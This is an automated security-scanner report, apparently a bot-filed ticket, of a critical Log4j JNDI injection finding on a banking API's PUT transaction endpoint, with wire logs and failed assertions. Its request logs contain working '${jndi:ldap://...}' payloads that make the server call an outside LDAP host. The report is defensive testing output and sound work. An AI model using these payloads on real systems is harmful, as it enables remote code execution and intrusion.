Title: log4j_injection Vulnerability on PUT:/api/v1/primary-transaction
Project: NB 58
Description:
Assertion
Log4j Injection is an attack in which the attacker is able to invoke a remote server by injecting JNDI lookup string to perform a remote LDAP lookup via vulnerable application.Risk: log4j_injection
Severity: Critical
API Endpoint: http://netbanking.apisec.ai:8080/api/v1/primary-transaction
Environment: Master
Playbook: ApiV1PrimaryTransactionPutBodyParamLog4jInjection
Researcher: [apisec Bot]
Title: log4j_injection Vulnerability on PUT:/api/v1/primary-transaction Project: NB 58 Description:
Assertion Log4j Injection is an attack in which the attacker is able to invoke a remote server by injecting JNDI lookup string to perform a remote LDAP lookup via vulnerable application.Risk: log4j_injection Severity: Critical API Endpoint: http://netbanking.apisec.ai:8080/api/v1/primary-transaction Environment: Master Playbook: ApiV1PrimaryTransactionPutBodyParamLog4jInjection Researcher: [apisec Bot]
QUICK TIPS
Suggestion: Effort Estimate: null Hrs Wire Logs: 05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction] 05:04:08 [D] [AVPTPBPLInjection] : Method [PUT] 05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default] 05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]] 05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 50.0, "availableBalance" : 1141028332, "createdBy" : "", "createdDate" : "", "description" : "Zvo7vbQ8", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "Zvo7vbQ8", "type" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "Zvo7vbQ8", "version" : "" }, "version" : "" }] 05:04:08 [D] [AVPTPBPLInjection] : Status code [200] 05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Y2IyNDRkZGYtM2VkMy00ODM2LTk1NmEtZjQ4MjM2ZDIzMGZj; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]] 05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies 05:04:08 [D] [AVPTPBPLInjection] : Response time [1204] 05:04:08 [D] [AVPTPBPLInjection] : Response size [306] 05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction] 05:04:08 [D] [AVPTPBPLInjection] : Method [PUT] 05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default] 05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]] 05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 4560.0, "availableBalance" : 2123707148, "createdBy" : "", "createdDate" : "", "description" : "OzRH0CHJ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "type" : "OzRH0CHJ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "OzRH0CHJ", "version" : "" }, "version" : "" }] 05:04:08 [D] [AVPTPBPLInjection] : Status code [200] 05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YWY4YmNlOTMtYjY5My00ZTg5LTllZDgtZjZiNzIwZGM4NTgy; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]] 05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies 05:04:08 [D] [AVPTPBPLInjection] : Response time [870] 05:04:08 [D] [AVPTPBPLInjection] : Response size [306] 05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction] 05:04:08 [D] [AVPTPBPLInjection] : Method [PUT] 05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default] 05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]] 05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 1540.0, "availableBalance" : 196975012, "createdBy" : "", "createdDate" : "", "description" : "U1Pp2F58", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "U1Pp2F58", "type" : "U1Pp2F58", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "version" : "" }, "version" : "" }] 05:04:08 [D] [AVPTPBPLInjection] : Status code [200] 05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZjE4Yzk0YjAtOTMwNS00YTA4LThjZDAtNGM4MDdkNmQyY2Q0; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]] 05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies 05:04:08 [D] [AVPTPBPLInjection] : Response time [1224] 05:04:08 [D] [AVPTPBPLInjection] : Response size [306] 05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction] 05:04:08 [D] [AVPTPBPLInjection] : Method [PUT] 05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default] 05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]] 05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 2718.0, "availableBalance" : 2011898732, "createdBy" : "", "createdDate" : "", "description" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "f5OaDF1p", "type" : "f5OaDF1p", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "f5OaDF1p", "version" : "" }, "version" : "" }] 05:04:08 [D] [AVPTPBPLInjection] : Status code [200] 05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OThkNGYyODktNjlhMy00MmQwLTg5MzItMTlmMjlmNmY3MzQ3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]] 05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies 05:04:08 [D] [AVPTPBPLInjection] : Response time [1021] 05:04:08 [D] [AVPTPBPLInjection] : Response size [306] 05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed] 05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed] 05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed] 05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.apisec.ai/#/app/vulnerabilities/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard/8adc81e585bef95e0185c869b96e1849/details
Project: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard
Environment: https://cloud.apisec.ai/#/app/config-environments/projects/8adc80ec84e1cb220184e5f27d494dfb/environmentList
Scan Dashboard: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/profiles/8adc80eb84e1c98e0184e5f2a02953c6/runs/8adc823d85bef6cb0185c869930d41f6
Playbook: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/playbooks/ApiV1PrimaryTransactionPutBodyParamLog4jInjection
Coverage: https://cloud.apisec.ai/#/app/config-categories/projects/8adc80ec84e1cb220184e5f27d494dfb/categories
Code Sample: https://cloud.apisec.ai/#/app/vulnerabilities/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard/8adc81e585bef95e0185c869b96e1849/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---